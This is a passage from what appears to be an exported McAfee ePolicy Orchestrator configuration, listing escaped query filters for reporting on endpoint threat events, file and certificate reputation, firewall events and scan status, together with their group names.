System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Months and Event ID Equals 18600 and System Name Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 35104 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 35105 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 35107 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Action Taken Equals Adaptive Threat Protection Blocked and Event ID Is any of 35104 )\\\",\\r\\n\\t\\t\\t\\\"(Action Taken Equals Adaptive Threat Protection Allowed and Event ID Is any of 35105 )\\\",\\r\\n\\t\\t\\t\\\"(Action Taken Equals Adaptive Threat Protection Cleaned and Event ID Is any of 35107 )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 35102 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 35103 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 35106 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Success Equals False and Start Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"Last Update Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"Last Update Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(((Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" or Detecting Product Name Equals \\\\\\\"Threat Intelligence\\\\\\\") and Threat Type Value is not blank and Event Category Does not belong to Operational and Event ID Does not equal 34928 ) and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"(((Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" or Detecting Product Name Equals \\\\\\\"Threat Intelligence\\\\\\\") and Threat Type Value is not blank and Event Category Does not belong to Operational and Event ID Does not equal 34928 ) and Event Generated Time Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Days and (Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" or Detecting Product Name Equals \\\\\\\"Threat Intelligence\\\\\\\") and Threat Type Value is not blank and Threat Name Value is not blank and Event Category Does not belong to Operational and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Weeks and (Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" or Detecting Product Name Equals \\\\\\\"Threat Intelligence\\\\\\\") and Threat Type Value is not blank and Threat Name Value is not blank and Event Category Does not belong to Operational and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Weeks and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Weeks and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Event ID Does not equal 34928 and Event Generated Time Is within the last 2 Days)\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 2 Weeks and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Weeks and (Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" or Detecting Product Name Equals \\\\\\\"Threat Intelligence\\\\\\\") and Threat Type Value is not blank and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Product Equals Endpoint Security Common or Product Equals Endpoint Security Threat Prevention or Product Equals Endpoint Security Firewall or Product Equals Endpoint Security Web Control )\\\",\\r\\n\\t\\t\\t\\\"(Product Equals Endpoint Security Common or Product Equals Endpoint Security Threat Prevention or Product Equals Endpoint Security Firewall or Product Equals Endpoint Security Web Control )\\\",\\r\\n\\t\\t\\t\\\"ESP Hotfix Value is not blank \\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 1 Weeks and Event ID Is any of 18051 , 18052 , 18053 , 18054 , 18055 , 18056 )\\\",\\r\\n\\t\\t\\t\\\"On-Demand Full Scan Date Is within the last 1 Weeks\\\",\\r\\n\\t\\t\\t\\\"On-Demand Quick Scan Date Is within the last 1 Weeks\\\",\\r\\n\\t\\t\\t\\\"(On-Demand Full Scan Date Is not within the last 1 Weeks and On-Demand Full Scan Date Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(On-Demand Full Scan Date Is not within the last 1 Months or On-Demand Full Scan Date Value is blank )\\\",\\r\\n\\t\\t\\t\\\"(OS Type Starts with \\\\\\\"Windows\\\\\\\" or OS Type Starts with \\\\\\\"Linux\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"OS Type Starts with \\\\\\\"Windows\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"OS Type Starts with \\\\\\\"Windows\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 3 Months and Event Category Does not belong to Operational and Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event ID Does not equal 34928 and Module Name Equals Threat Prevention)\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 2 Quarters and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type Equals Test) and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type Equals Test) and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type Equals Test) and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Event ID Equals 1092 or Event ID Equals 1095 ))\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type Equals Test) and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type Equals Test) and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type Equals Test) and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Threat Type Equals Potentially Unwanted Program or Threat Type Equals Adware or Threat Type Equals Remote Admin Tool or Threat Type Equals Keylogger or Threat Type Equals Password Cracker or Threat Type Equals Dialer or Threat Type Equals Spyware or Threat Type Equals Virus or Threat Type Equals Trojan or Threat Type Equals Joke or Threat Type Equals Test) and Threat Source Host Name Does not equal \\\\\\\"_\\\\\\\" and Event ID Does not equal 34928 )\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 3 Months and (Event ID Equals 18051 or Event ID Equals 18052 or Event ID Equals 18053 or Event ID Equals 18054 or Event ID Equals 18055 or Event ID Equals 18056 ))\\\",\\r\\n\\t\\t\\t\\\"Threat Prevention Hotfix Value is not blank \\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Policy Enforcement Mode Equals Policy Bypassed\\\",\\r\\n\\t\\t\\t\\\"((Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event ID Equals 35001 and Analyzer Detection Method Equals \\\\\\\"Firewall\\\\\\\") and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"((Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event ID Is any of 35000 , 35001 , 35002 and Analyzer Detection Method Equals \\\\\\\"Firewall\\\\\\\") and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"((Analyzer McAfee GTI Query Equals True and Module Name Equals Firewall) and Event Generated Time Is within the last 6 Months)\\\",\\r\\n\\t\\t\\t\\\"((Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event ID Equals 35002 and Analyzer Detection Method Equals \\\\\\\"Firewall\\\\\\\") and Event Generated Time Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(LeafNodeId Greater than or equals 1 and Last Changed Is before now)\\\",\\r\\n\\t\\t\\t\\\"LeafNodeId Greater than or equals 1 \\\",\\r\\n\\t\\t\\t\\\"LeafNodeId Greater than or equals 1 \\\",\\r\\n\\t\\t\\t\\\"LeafNodeId Greater than or equals 1 \\\",\\r\\n\\t\\t\\t\\\"LeafNodeId Greater than or equals 1 \\\",\\r\\n\\t\\t\\t\\\"Firewall Status Equals Enabled\\\",\\r\\n\\t\\t\\t\\\"Firewall Hotfixes Value is not blank \\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Cleanup Date Is before now\\\",\\r\\n\\t\\t\\t\\\"((Composite Reputation Equals Most Likely Malicious or Composite Reputation Equals Might be Malicious) and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Last access Is within the last 1 Months and (Composite Reputation Equals Might be Malicious or Composite Reputation Equals Most Likely Malicious))\\\",\\r\\n\\t\\t\\t\\\"(First contact Is within the last 1 Months and (Composite Reputation Equals Might be Malicious or Composite Reputation Equals Most Likely Malicious))\\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Unknown and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Last access Is within the last 1 Months and Composite Reputation Equals Unknown)\\\",\\r\\n\\t\\t\\t\\\"(Action Taken Equals Adaptive Threat Protection Would Block and Event ID Is any of 35102 )\\\",\\r\\n\\t\\t\\t\\\"(Action Taken Equals Adaptive Threat Protection Allowed and Event ID Is any of 35103 )\\\",\\r\\n\\t\\t\\t\\\"(Action Taken Equals Adaptive Threat Protection Would Clean and Event ID Is any of 35106 )\\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35104 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35102 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35105 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35103 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35107 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35106 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35104 , 35105 , 35107 , 35112 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35102 , 35103 , 35106 , 35111 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35104 , 35105 , 35107 , 35112 \\\",\\r\\n\\t\\t\\t\\\"Event ID Is any of 35102 , 35103 , 35106 , 35111 \\\",\\r\\n\\t\\t\\t\\\"(Event ID Equals 34928 and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(First contact Is within the last 1 Months and Composite Reputation Equals Unknown)\\\",\\r\\n\\t\\t\\t\\\"(ATD Reputation Value is not blank and Last access Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"Tags Tag Contains \\\\\\\"TIESERVER\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Tags Tag Contains \\\\\\\"TIESERVER\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Tags Tag Contains \\\\\\\"TIESERVER\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Tags Tag Contains \\\\\\\"TIESERVER\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"User Privileged Permissions Equals Monitor Only\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Reputation Provider Equals GTI Certificate and Created Date Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"((Reputation Equals Known Malicious or Reputation Equals Might be Malicious or Reputation Equals Most Likely Malicious or Reputation Equals Unknown or Reputation Equals Not Set) and Created Date Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Reputation Provider Equals Enterprise Certificate and Reputation Count Greater than 0 )\\\",\\r\\n\\t\\t\\t\\\"(CTD Reputation Value is not blank and Last access Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Max Fail Attempt Count Does not equal 0 and Count of Failed Attempts Does not equal 0 )\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Event ID Is any of 2412 , 2411 and Event Type Equals \\\\\\\"Install\\\\\\\" and Product Name Equals \\\\\\\"MCPAGENT1000\\\\\\\" and Event Generated Time Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Tags Tag Contains \\\\\\\"TIESERVER\\\\\\\" and Product Version (McAfee DXL Broker) Greater than or equals \\\\\\\"1\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"((Enterprise Reputation Value is not blank and Enterprise Reputation Does not equal Not Set) and Last access Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event ID Is any of 35000 , 35001 , 35002 and Analyzer Detection Method Equals \\\\\\\"Firewall\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 2 Weeks and Tags Tag Contains \\\\\\\"dc_vm_auto\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Tags Has tag \\\\\\\"\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"(Node Type Equals \\\\\\\"Hypervisor\\\\\\\" and Property Name Equals \\\\\\\"trustattestation\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"AV Protection By Does not equal Unprotected\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Event Generated Time Is within the last 2 Weeks and Tags Tag Contains \\\\\\\"dc_vm_auto\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Node Type Equals \\\\\\\"vm\\\\\\\"\\\",\\r\\n\\t\\t\\t\\\"Vendor Equals VMware vSphere\\\",\\r\\n\\t\\t\\t\\\"((GTI Reputation Value is not blank and GTI Reputation Does not equal Not Set) and Refresh Date Is within the last 1 Days)\\\",\\r\\n\\t\\t\\t\\\"Cleanup Date Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"First contact Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"((Enterprise Reputation Value is not blank and Enterprise Reputation Does not equal Not Set) and Refresh Date Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"ATD Reputation Value is not blank \\\",\\r\\n\\t\\t\\t\\\"Refresh Date Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"(ATD Reputation Value is not blank and Refresh Date Is within the last 3 Months)\\\",\\r\\n\\t\\t\\t\\\"(ATD Reputation Value is not blank and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"CTD Reputation Value is not blank \\\",\\r\\n\\t\\t\\t\\\"Refresh Date Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"(CTD Reputation Value is not blank and Refresh Date Is within the last 3 Months)\\\",\\r\\n\\t\\t\\t\\\"(CTD Reputation Value is not blank and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"((GTI Reputation Equals Known Trusted Installer or GTI Reputation Equals Known Trusted or GTI Reputation Equals Most Likely Trusted or GTI Reputation Equals Might be Trusted) and (Enterprise Reputation Equals Known Trusted Installer or Enterprise Reputation Equals Known Trusted or Enterprise Reputation Equals Most Likely Trusted or Enterprise Reputation Equals Might be Trusted))\\\",\\r\\n\\t\\t\\t\\\"((GTI Reputation Equals Known Malicious or GTI Reputation Equals Most Likely Malicious or GTI Reputation Equals Might be Malicious) and (Enterprise Reputation Equals Known Malicious or Enterprise Reputation Equals Most Likely Malicious or Enterprise Reputation Equals Might be Malicious))\\\",\\r\\n\\t\\t\\t\\\"((Enterprise Reputation Equals Known Malicious or Enterprise Reputation Equals Most Likely Malicious or Enterprise Reputation Equals Might be Malicious) and (GTI Reputation Equals Known Trusted Installer or GTI Reputation Equals Known Trusted or GTI Reputation Equals Most Likely Trusted or GTI Reputation Equals Might be Trusted))\\\",\\r\\n\\t\\t\\t\\\"Insertion Time (UTC) Is within the last 4 Weeks\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"((Enterprise Reputation Equals Known Trusted Installer or Enterprise Reputation Equals Known Trusted or Enterprise Reputation Equals Most Likely Trusted or Enterprise Reputation Equals Might be Trusted) and (GTI Reputation Equals Might be Malicious or GTI Reputation Equals Most Likely Malicious or GTI Reputation Equals Known Malicious))\\\",\\r\\n\\t\\t\\t\\\"(((Composite Reputation Equals Unknown or Composite Reputation Equals Not Set) and Certificate SHA-1 Value is blank ) and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(First contact Is within the last 6 Months and Composite Reputation Equals Unknown and Last access Is within the last 1 Weeks and Certificate SHA-1 Value is blank )\\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Unknown and First contact Is within the last 1 Months and Certificate SHA-1 Value is blank )\\\",\\r\\n\\t\\t\\t\\\"(File Parent Value is not blank and Composite Reputation Equals Unknown and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Unknown and First contact Is within the last 1 Months and Local Reputation Count Greater than 10 )\\\",\\r\\n\\t\\t\\t\\\"Date Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"(((Composite Reputation Equals Unknown or Composite Reputation Equals Not Set) and Certificate SHA-1 Value is not blank and Enterprise Count Greater than 0 ) and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(First contact Is within the last 1 Months and Certificate SHA-1 Value is not blank and Composite Reputation Equals Unknown and Enterprise Count Greater than 0 )\\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Unknown and First contact Is within the last 1 Months and Certificate SHA-1 Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Unknown and First contact Is within the last 1 Months and Certificate SHA-1 Value is not blank )\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Last Update Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"Last Update Is within the last 1 Months\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Undefined Device Classes List Value is not blank \\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Is Chrome Version supported Equals Unsupported\\\",\\r\\n\\t\\t\\t\\\"(Reputation Provider Equals GTI Certificate and Modified Date Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"Date Is within the last 1 Weeks\\\",\\r\\n\\t\\t\\t\\\"(Reputation Provider Equals GTI File and Create Date Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"(((Reputation Equals Known Malicious or Reputation Equals Might be Malicious or Reputation Equals Most Likely Malicious or Reputation Equals Unknown or Reputation Equals Not Set) and Reputation Provider Equals GTI File) and Create Date Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Reputation Provider Equals Enterprise File and Reputation Count Greater than 0 )\\\",\\r\\n\\t\\t\\t\\\"(Reputation Provider Equals GTI File and Modified Date Is within the last 1 Weeks)\\\",\\r\\n\\t\\t\\t\\\"Date Is within the last 1 Weeks\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"Executed Equals 1 \\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Known Malicious and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Last access Is within the last 1 Months and Composite Reputation Equals Known Malicious)\\\",\\r\\n\\t\\t\\t\\\"(Composite Reputation Equals Known Malicious and First contact Is within the last 1 Months)\\\",\\r\\n\\t\\t\\t\\\"(Usage Month Is within the last 6 Months and Cloud Provider Does not equal \\\\\\\"vCenter.vendor\\\\\\\")\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 1 Days and (Analyzer Detection Method Equals \\\\\\\"Real Protect Client\\\\\\\" or Analyzer Detection Method Equals \\\\\\\"Real Protect Cloud\\\\\\\"))\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 1 Weeks and (Analyzer Detection Method Equals \\\\\\\"Real Protect Client\\\\\\\" or Analyzer Detection Method Equals \\\\\\\"Real Protect Cloud\\\\\\\"))\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 1 Months and (Analyzer Detection Method Equals \\\\\\\"Real Protect Client\\\\\\\" or Analyzer Detection Method Equals \\\\\\\"Real Protect Cloud\\\\\\\"))\\\",\\r\\n\\t\\t\\t\\\"(Detecting Product Name Equals \\\\\\\"McAfee Endpoint Security\\\\\\\" and Event Generated Time Is within the last 1 Quarters and (Analyzer Detection Method Equals \\\\\\\"Real Protect Client\\\\\\\" or Analyzer Detection Method Equals \\\\\\\"Real Protect Cloud\\\\\\\"))\\\",\\r\\n\\t\\t\\t\\\"\\\",\\r\\n\\t\\t\\t\\\"\\\"\\r\\n\\t\\t]\"",
    "groupName": "\"[\\r\\n\\t\\t\\t\\\"Permissions\\\",\\r\\n\\t\\t\\t\\\"Permissions\\\",\\r\\n\\t\\t\\t\\\"Permissions\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"Detections and Compliance\\\",\\r\\n\\t\\t\\t\\\"System Management\\\",\\r\\n\\t\\t\\t\\\"System Management\\\",\\r\\n\\t\\t\\t\\\"Detections and Compliance\\\",\\r\\n\\t\\t\\t\\\"Detections and Compliance\\\",\\r\\n\\t\\t\\t\\\"Detections and Compliance\\\",\\r\\n\\t\\t\\t\\\"Detections and Compliance\\\",\\r\\n\\t\\t\\t\\\"System Management\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"Detections and Compliance\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"System Management\\\",\\r\\n\\t\\t\\t\\\"System Management\\\",\\r\\n\\t\\t\\t\\\"System Management\\\",\\r\\n\\t\\t\\t\\\"User Auditing\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment\\\",\\r\\n\\t\\t\\t\\\"Policy Assignment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Threat Events\\\",\\r\\n\\t\\t\\t\\\"Threat Events\\\",\\r\\n\\t\\t\\t\\\"Threat Events\\\",\\r\\n\\t\\t\\t\\\"Product Deployment\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Threat Events\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Agent Management\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint Security\\\",\\r\\n\\t\\t\\t\\\"Endpoint 